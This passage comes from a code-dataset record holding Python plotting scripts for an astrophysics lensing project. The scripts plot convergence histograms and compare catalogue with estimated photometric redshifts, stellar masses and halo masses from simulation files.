statistics(kappa_0,bin_stat,min_kappa,max_kappa)\nkappa_0 = kappa_0 / np.sum(kappa_0 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_45_gal_45_gamma_45_z_120_gal_120_z_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian1,stddev1,kappa_values = statistics(kappa_1,bin_stat,min_kappa,max_kappa)\nkappa_1 = kappa_1 / np.sum(kappa_1 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_45_gal_45_gamma_45_zoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian2,stddev2,kappa_values = statistics(kappa_2,bin_stat,min_kappa,max_kappa)\nkappa_2 = kappa_2 / np.sum(kappa_2 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_3 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_120_gal_120_gamma_120_oneoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian3,stddev3,kappa_values = statistics(kappa_3,bin_stat,min_kappa,max_kappa)\nkappa_3 = kappa_3 / np.sum(kappa_3 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_4 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian4,stddev4,kappa_values = statistics(kappa_4,bin_stat,min_kappa,max_kappa)\nkappa_4 = kappa_4 / np.sum(kappa_4 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_5 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_120_gal_120_gamma_120_oneoverr_45_gal_45_zoverr_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian5,stddev5,kappa_values = statistics(kappa_5,bin_stat,min_kappa,max_kappa)\nkappa_5 = kappa_5 / np.sum(kappa_5 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_6 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_120_gal_120_gamma_120_zoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian6,stddev6,kappa_values = statistics(kappa_6,bin_stat,min_kappa,max_kappa)\nkappa_6 = kappa_6 / np.sum(kappa_6 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_7 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_45_gal_45_gamma_45_oneoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian7,stddev7,kappa_values = statistics(kappa_7,bin_stat,min_kappa,max_kappa)\nkappa_7 = kappa_7 / np.sum(kappa_7 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_8 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_45_gal_45_gamma_45_z_120_gal_120_z_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian8,stddev8,kappa_values = statistics(kappa_8,bin_stat,min_kappa,max_kappa)\nkappa_8 = kappa_8 / np.sum(kappa_8 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_9 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_45_gal_45_gamma_45_zoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian9,stddev9,kappa_values = statistics(kappa_9,bin_stat,min_kappa,max_kappa)\nkappa_9 = kappa_9 / np.sum(kappa_9 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_10 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_45_gal_45_gamma_45_zoverr_120_gal_120_zoverr_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian10,stddev10,kappa_values = statistics(kappa_10,bin_stat,min_kappa,max_kappa)\nkappa_10 = kappa_10 / np.sum(kappa_10 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_11 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_45_gal_45_oneoverr_22.5_med_increments1_1.cat\" % root, usecols=[0], unpack=True)\nmedian11,stddev11,kappa_values = statistics(kappa_11,bin_stat,min_kappa,max_kappa)\nkappa_11 = kappa_11 / np.sum(kappa_11 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_12 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_45_gal_45_zoverr_22.5_med_increments1_1.cat\" % root, usecols=[0], unpack=True)\nmedian12,stddev12,kappa_values = statistics(kappa_12,bin_stat,min_kappa,max_kappa)\nkappa_12 = kappa_12 / np.sum(kappa_12 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_13 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_gamma_120_oneoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian13,stddev13,kappa_values = statistics(kappa_13,bin_stat,min_kappa,max_kappa)\nkappa_13 = kappa_13 / np.sum(kappa_13 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_14 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian14,stddev14,kappa_values = statistics(kappa_14,bin_stat,min_kappa,max_kappa)\nkappa_14 = kappa_14 / np.sum(kappa_14 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_15 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_gamma_120_oneoverr_45_gal_45_zoverr_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian15,stddev15,kappa_values = statistics(kappa_15,bin_stat,min_kappa,max_kappa)\nkappa_15 = kappa_15 / np.sum(kappa_15 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_16 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_gamma_120_zoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian16,stddev16,kappa_values = statistics(kappa_16,bin_stat,min_kappa,max_kappa)\nkappa_16 = kappa_16 / np.sum(kappa_16 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_17 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_oneoverr_22.5_med_increments1_1.cat\" % root, usecols=[0], unpack=True)\nmedian17,stddev17,kappa_values = statistics(kappa_17,bin_stat,min_kappa,max_kappa)\nkappa_17 = kappa_17 / np.sum(kappa_17 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_18 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments1_1_1_1.cat\" % root, usecols=[0], unpack=True)\nmedian18,stddev18,kappa_values = statistics(kappa_18,bin_stat,min_kappa,max_kappa)\nkappa_18 = kappa_18 / np.sum(kappa_18 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_19 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_oneoverr_45_gal_45_zoverr_22.5_med_increments1_1_1_1.cat\" % root, usecols=[0], unpack=True)\nmedian19,stddev19,kappa_values = statistics(kappa_19,bin_stat,min_kappa,max_kappa)\nkappa_19 = kappa_19 / np.sum(kappa_19 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_20 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_zoverr_22.5_med_increments1_1.cat\" % root, usecols=[0], unpack=True)\nmedian20,stddev20,kappa_values = statistics(kappa_20,bin_stat,min_kappa,max_kappa)\nkappa_20 = kappa_20 / np.sum(kappa_20 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#s = \"%.3f %.3f LOS=%d\" % (median,std1,LOS)\ns0 = \"%.3f %.3f\" % (median0,stddev0)\ns1 = \"%.3f %.3f\" % (median1,stddev1)\ns2 = \"%.3f %.3f\" % (median2,stddev2)\ns3 = \"%.3f %.3f\" % (median3,stddev3)\ns4 = \"%.3f %.3f\" % (median4,stddev4)\ns5 = \"%.3f %.3f\" % (median5,stddev5)\ns6 = \"%.3f %.3f\" % (median6,stddev6)\ns7 = \"%.3f %.3f\" % (median7,stddev7)\ns8 = \"%.3f %.3f\" % (median8,stddev8)\ns9 = \"%.3f %.3f\" % (median9,stddev9)\ns10 = \"%.3f %.3f\" % (median10,stddev10)\ns11 = \"%.3f %.3f\" % (median11,stddev11)\ns12 = \"%.3f %.3f\" % (median12,stddev12)\ns13 = \"%.3f %.3f\" % (median13,stddev13)\ns14 = \"%.3f %.3f\" % (median14,stddev14)\ns15 = \"%.3f %.3f\" % (median15,stddev15)\ns16 = \"%.3f %.3f\" % (median16,stddev16)\ns17 = \"%.3f %.3f\" % (median17,stddev17)\ns18 = \"%.3f %.3f\" % (median18,stddev18)\ns19 = \"%.3f %.3f\" % (median19,stddev19)\ns20 = \"%.3f %.3f\" % (median20,stddev20)\n\nplt.subplot(1,1,1)\nax = plt.subplot(1,1,1)\nax.tick_params(labelsize=15)\nplt.xlim(min_kappa_plot, max_kappa_plot)\nplt.ylim(0, 0.25)\n\nwinlen = 12\n#smooth(kappa_3,winlen,'flat')\n#smooth(kappa_3,winlen,'hanning')\n#smooth(kappa_3,winlen,'hamming')\n#smooth(kappa_3,winlen,'bartlett')\n#smooth(kappa_3,winlen,'blackman')\n\nplt.plot(kappa_values[:-1],smooth(kappa_11,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='b', linewidth=1, linestyle=':', label ='%s; $45: 1,1/r$' %s11)\nplt.plot(kappa_values[:-1],smooth(kappa_12,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='g', linewidth=1, linestyle=':', label ='%s; $45: 1,z/r$' %s12)\nplt.plot(kappa_values[:-1],smooth(kappa_17,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='r', linewidth=1, linestyle=':', label ='%s; $120: 1,1/r$' %s17)\nplt.plot(kappa_values[:-1],smooth(kappa_20,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='c', linewidth=1, linestyle=':', label ='%s; $120: 1,z/r$' %s20)\nplt.plot(kappa_values[:-1],smooth(kappa_18,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle=':', label ='%s; $120: 1,1/r; 45:1,1/r$' %s18)\nplt.plot(kappa_values[:-1],smooth(kappa_19,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='k', linewidth=1, linestyle=':', label ='%s; $120: 1,1/r; 45:1,z/r$' %s19)\n\nplt.plot(kappa_values[:-1],smooth(kappa_0,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='b', linewidth=1, linestyle='--', label ='%s; $45: 1,\\gamma_c,1/r$' %s0)\nplt.plot(kappa_values[:-1],smooth(kappa_2,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='g', linewidth=1, linestyle='--', label ='%s; $45: 1,\\gamma_c,z/r$' %s2)\nplt.plot(kappa_values[:-1],smooth(kappa_3,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='r', linewidth=1, linestyle='--', label ='%s; $120: 1,\\gamma_c,1/r$' %s3)\nplt.plot(kappa_values[:-1],smooth(kappa_6,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='c', linewidth=1, linestyle='--', label ='%s; $120: 1,\\gamma_c,z/r$' %s6)\n#plt.plot(kappa_values[:-1],smooth(kappa_1,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle='--', label ='%s; $45: 1,\\gamma_c,z; 120:1,z$' %s1)\nplt.plot(kappa_values[:-1],smooth(kappa_4,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle='--', label ='%s; $120: 1,\\gamma_c,1/r; 45:1,1/r$' %s4)\nplt.plot(kappa_values[:-1],smooth(kappa_5,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='k', linewidth=1, linestyle='--', label ='%s; $120: 1,\\gamma_c,1/r; 45:1,z/r$' %s5)\n\nplt.plot(kappa_values[:-1],smooth(kappa_7,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='b', linewidth=1, linestyle='-', label ='%s; $45: 1,\\gamma_p,1/r$' %s7)\nplt.plot(kappa_values[:-1],smooth(kappa_9,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='g', linewidth=1, linestyle='-', label ='%s; $45: 1,\\gamma_p,z/r$' %s9)\nplt.plot(kappa_values[:-1],smooth(kappa_13,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='r', linewidth=1, linestyle='-', label ='%s; $120: 1,\\gamma_p,1/r$' %s13)\nplt.plot(kappa_values[:-1],smooth(kappa_16,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='c', linewidth=1, linestyle='-', label ='%s; $120: 1,\\gamma_p,z/r$' %s16)\n#plt.plot(kappa_values[:-1],smooth(kappa_8,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle='-', label ='%s; $45: 1,\\gamma_p,z; 120:1,z$' %s8)\nplt.plot(kappa_values[:-1],smooth(kappa_10,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='y', linewidth=1, linestyle='-', label ='%s; $45: 1,\\gamma_p,z/r; 120:1,z/r$' %s10)\nplt.plot(kappa_values[:-1],smooth(kappa_14,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle='-', label ='%s; $120: 1,\\gamma_p,1/r; 45:1,1/r$' %s14)\nplt.plot(kappa_values[:-1],smooth(kappa_15,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='k', linewidth=1, linestyle='-', label ='%s; $120: 1,\\gamma_p,1/r; 45:1,z/r$' %s15)\n\nplt.xlabel(r'$\\kappa$', fontsize=20)\nplt.ylabel(r'normalized counts', fontsize=20)\nplt.legend(loc=\"lower right\",fontsize=7)\nplt.title(\"Convergence distributions using De Lucia & Blaizot (2007) galaxies\",fontsize=13)\nplt.savefig('%skappahist_handpicked.png' % root, dpi=250, bbox_inches='tight')\n" }, { "alpha_fraction": 0.5532479286193848, "alphanum_fraction": 0.610701322555542, "avg_line_length": 33.968326568603516, "blob_id": "b124da42794ba1fa7a6ce327fbac7175d0e6eb51", "content_id": "e0401ad7de5f9749de56ac6f00daa2f35347e13a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15456, "license_type": "no_license", "max_line_length": 254, "num_lines": 442, "path": "/python/plot_utilities/plot_photozmstarmhalodensity.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# produces density plot for catalogue vs. computed values of redshift, stellar masses and halo masses\n\nfrom matplotlib.colors import LogNorm\nimport scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\n\nfont = 10\nticksize = 10\n\nplt.clf()\nfig = plt.figure(figsize=(10,12))\n#fig, axes = plt.subplots(nrows=2, ncols=2)\n\nax1 = fig.add_subplot(3,2,1)\nax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images_forNAOJ.txt\" % (i,j,k), usecols=(1, 8), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim = 1.66\noutlim = 0.15\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(rotation='vertical',size = ticksize)\nplt.yticks(size = ticksize)\n#m, b = np.polyfit(x, y, 1)\ndef func(x, m):\n return m+x\ncolorbar()\ndelta = (y-x)/(1+x)\n#delta = (y-(m+x))/(1+x)\n#firstpass_std = np.std(delta)\nfirstpass_std = np.std(delta)\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects; outliers\" % (len(x))\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\nxx = np.linspace(-0.15, 20, 1000)\nxxx = np.linspace(0.15, 20, 1000)\n#plt.plot(x, m*x + b, '--')\nplt.plot(x, m+x, '--')\nplt.plot(xx, 0.85*xx-0.15, 'r--')\nplt.plot(xxx, 1.15*xxx+0.15, 'r--')\nplt.plot(x, x)\nax1.text(0.05, 0.95, stdoutobj, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.90, stdout, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.85, outlier, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.80, bias, fontsize=7, color='black',transform=ax1.transAxes)\n#ax1.text(0.05, 0.80, bestfit, fontsize=7, color='black',transform=ax1.transAxes)\nplt.xlabel('catalogue', fontsize=font)\nplt.ylabel('photoz ugrizJHK', fontsize=font)\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlim(0, zlim)\nplt.ylim(0, zlim)\n#plt.title(' ugriJHK catalogue - pdz')\n\n\n\nax1 = fig.add_subplot(3,2,2)\nax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugriz.images_forNAOJ.txt\" % (i,j,k), usecols=(1, 8), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim = 1.66\noutlim = 0.15\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(rotation='vertical',size = ticksize)\nplt.yticks(size = ticksize)\n#m, b = np.polyfit(x, y, 1)\ndef func(x, m):\n return m+x\ncolorbar()\ndelta = (y-x)/(1+x)\n#delta = (y-(m+x))/(1+x)\n#firstpass_std = np.std(delta)\nfirstpass_std = np.std(delta)\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects\" % (len(x))\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\nxx = np.linspace(-0.15, 20, 1000)\nxxx = np.linspace(0.15, 20, 1000)\n#plt.plot(x, m*x + b, '--')\nplt.plot(x, m+x, '--')\nplt.plot(xx, 0.85*xx-0.15, 'r--')\nplt.plot(xxx, 1.15*xxx+0.15, 'r--')\nplt.plot(x, x)\nax1.text(0.05, 0.95, stdoutobj, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.90, stdout, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.85, outlier, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.80, bias, fontsize=7, color='black',transform=ax1.transAxes)\n#ax1.text(0.05, 0.80, bestfit, fontsize=7, color='black',transform=ax1.transAxes)\nplt.xlabel('catalogue', fontsize=font)\nplt.ylabel('photoz ugriz', fontsize=font)\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlim(0, zlim)\nplt.ylim(0, zlim)\n#plt.title(' ugriz catalogue - pdz')\n\n\n\nax1 = fig.add_subplot(3,2,3)\nax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images_forNAOJ.txt\" % (i,j,k), usecols=(5, 10), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim = 12\nzlim_ = 7\noutlim = 0.5\nx = np.log10(x)\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nx = x[abs(y) > zlim_]\ny = y[abs(y) > zlim_]\ny = y[abs(x) > zlim_]\nx = x[abs(x) > zlim_]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(size = ticksize)\nplt.yticks(size = ticksize)\n#m, b = np.polyfit(x, y, 1)\ndef func(x, m):\n return m+x\ncolorbar()\ndelta = (y-x)\n#delta = (y-(m+x))/(1+x)\n#firstpass_std = np.std(delta)\nfirstpass_std = np.std(delta)\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects\" % len(x)\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\n#plt.plot(x, m*x + b, '--')\nplt.plot(x, m+x, '--')\nplt.plot(x, x+0.5, 'r--')\nplt.plot(x, x-0.5, 'r--')\nplt.plot(x, x)\nax1.text(0.05, 0.95, stdoutobj, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.90, stdout, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.85, outlier, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.80, bias, fontsize=7, color='black',transform=ax1.transAxes)\n#ax1.text(0.05, 0.80, bestfit, fontsize=7, color='black',transform=ax1.transAxes)\nplt.xlabel('catalogue $\\log M_\\star$ ugriJHK', fontsize=font)\nplt.ylabel('measured $\\log M_\\star$ ugriJHK', fontsize=font)\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlim(zlim_, zlim)\nplt.ylim(zlim_, zlim)\n#plt.title(' ugriJHK catalogue - measured Mstar')\n\n\n\nax1=plt.subplot(3,2,4)\nax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugriz.images_forNAOJ.txt\" % (i,j,k), usecols=(5, 9), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim_ = 7\noutlim = 0.5\nx = np.log10(x)\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nx = x[abs(y) > zlim_]\ny = y[abs(y) > zlim_]\ny = y[abs(x) > zlim_]\nx = x[abs(x) > zlim_]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(size = ticksize)\nplt.yticks(size = ticksize)\n#m, b = np.polyfit(x, y, 1)\ndef func(x, m):\n return m+x\ndelta = y-x\ncolorbar()\n#delta = (y-(m+x))/(1+x)\n#firstpass_std = np.std(delta)\nfirstpass_std = np.std(delta)\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects\" % len(x)\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\n#plt.plot(x, m*x + b, '--')\nplt.plot(x, m+x, '--')\nplt.plot(x, x+0.5, 'r--')\nplt.plot(x, x-0.5, 'r--')\nplt.plot(x, x)\nax1.text(0.05, 0.95, stdoutobj, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.90, stdout, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.85, outlier, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.80, bias, fontsize=7, color='black',transform=ax1.transAxes)\n#ax1.text(0.05, 0.80, bestfit, fontsize=7, color='black',transform=ax1.transAxes)\nplt.xlabel('catalogue $\\log M_\\star$ ugriz', fontsize=font)\nplt.ylabel('measured $\\log M_\\star$ ugriz', fontsize=font)\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlim(zlim_, zlim)\nplt.ylim(zlim_, zlim)\n#plt.title(' ugriz catalogue - measured Mstar')\n\nax1 = fig.add_subplot(3,2,5)\nax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images_forNAOJ.txt\" % (i,j,k), usecols=(4, 12), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim = 14.5\nzlim_ = 10\noutlim = 0.5\nx = np.log10(x)\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nx = x[abs(y) > zlim_]\ny = y[abs(y) > zlim_]\ny = y[abs(x) > zlim_]\nx = x[abs(x) > zlim_]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(rotation='vertical',size = ticksize)\nplt.yticks(size = ticksize)\n#m, b = np.polyfit(x, y, 1)\ndef func(x, m):\n return m+x\ncolorbar()\ndelta = (y-x)\n#delta = (y-(m+x))/(1+x)\n#firstpass_std = np.std(delta)\nfirstpass_std = np.std(delta)\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects\" % len(x)\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * 